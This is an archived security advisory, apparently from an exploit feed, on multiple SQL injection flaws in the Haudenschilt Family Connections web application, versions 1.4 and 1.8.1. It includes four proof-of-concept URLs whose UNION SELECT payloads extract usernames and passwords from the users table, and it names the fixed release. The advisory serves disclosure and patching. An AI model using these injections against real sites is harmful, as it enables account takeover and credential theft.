|
Feeds -
Exploits
|
|
Written by CWH Underground
|
|
Tuesday, 31 March 2009 22:48 |
Haudenschilt Family Connections Multiple SQL Injection Vulnerabilities
-\\Bugtraq ID: 29722
-\\Class: Input Validation Error
-\\CVE:
-\\Remote: Yes
-\\Local: No
-\\Published: Jun 14 2008 12:00AM
-\\Updated: Mar 31 2009 06:56PM
-\\Credit: CWH Underground
-\\Vulnerable: Haudenschilt Family Connections 1.8.1 Haudenschilt Family Connections 1.4
-\\Not Vulnerable: Haudenschilt Family Connections 1.8.2
-\\Discussion Family Connections is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to Family Connections 1.8.2 are vulnerable.
-\\Exploit(s)/PoC(s): An attacker can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/fcms/addressbook.php?address=1/**/UNION/**/SELECT/**/1,2, password,username,5,6,7,8,9,10,11,12,13,14,15,16/**/FROM/**/fcms_users http://www.example.com/fcms/familynews.php?getnews=-9999/**/UNION/**/SELECT/**/1, 2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19/**/FROM /**/fcms_users&newsid=2 http://www.example.com/fcms/home.php?action=results&poll_id=-9999/**/UNION/** /SELECT/**/1,concat(username,0x3a,password),3,4,5/**/FROM/**/fcms_users-- http://www.example.com/path/home.php?poll_id=-1 UNION ALL SELECT 1,NULL,3,CONCAT (username, 0x3a, password) FROM fcms_users%23
-\\Solution The vendor has released updates. Please contact the vendor for details.
Haudenschilt Family Connections 1.8.1 --Haudenschilt FCMS_1.8.2.zip http://downloads.sourceforge.net/fam-connections/FCMS_1.8.2.zihttp://downloads. sourceforge.net/fam-connections/FCMS_1.8.2.zip
-\\Reference(s) --Family Connections Homepage http://www.haudenschilt.com/fcms/index.htm (Haudenschilt) --Family Connections 1.8.1 Multiple Remote Vulnerabilities http://www.securityfocus.com/archive/1/50227 ("Salvatore \"drosophila\" Fresta" <
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
>) --Re: Family Connections 1.8.1 Multiple Remote Vulnerabilities http://www.securityfocus.com/archive/1/50231 (
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
)
|